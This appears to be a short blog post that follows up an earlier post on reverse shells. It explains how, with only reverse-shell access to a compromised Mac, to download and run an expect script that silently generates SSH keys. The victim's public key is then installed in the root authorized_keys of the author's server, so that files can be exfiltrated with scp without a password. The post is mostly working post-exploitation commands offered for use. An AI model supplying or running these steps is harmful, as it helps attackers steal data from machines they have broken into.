Because of how the reverse shell in my last post works most commands don’t work if it takes multiple lines or requires a password like scp. So to fix this lets generate a rsa public and private key. Assume you only have reverse shell access you can download this code off a webserver using curl -O
#!/usr/bin/expect
spawn ssh-keygen -t rsa
expect “Enter file in which to save the key”
send “\r”
expect “Enter passphrase”
send “\r”
expect “Enter same passphrase again:”
send “\r”
expect “Your identification has”
run that as a bash script and it will generate two keys in /Users/useraname/.ssh you want the public key id_rsa.pub
In your reverse shell navigate to the directory and type “cat id_rsa.pub” and copy what it gives you. Go onto your server and find your authorized ssh hosts. On ubuntu it is “/root/.ssh/authorized_keys” so when logged onto my server I opened that file and added the data from the cat command. Now you can do “scp file.zip root@server.com:/” and it will upload the file without asking for a password and you can do it in the reverse shell. TA DA!
ssh remote-machine ‘cat >> .ssh/authorized_keys’ < .ssh/identity.pub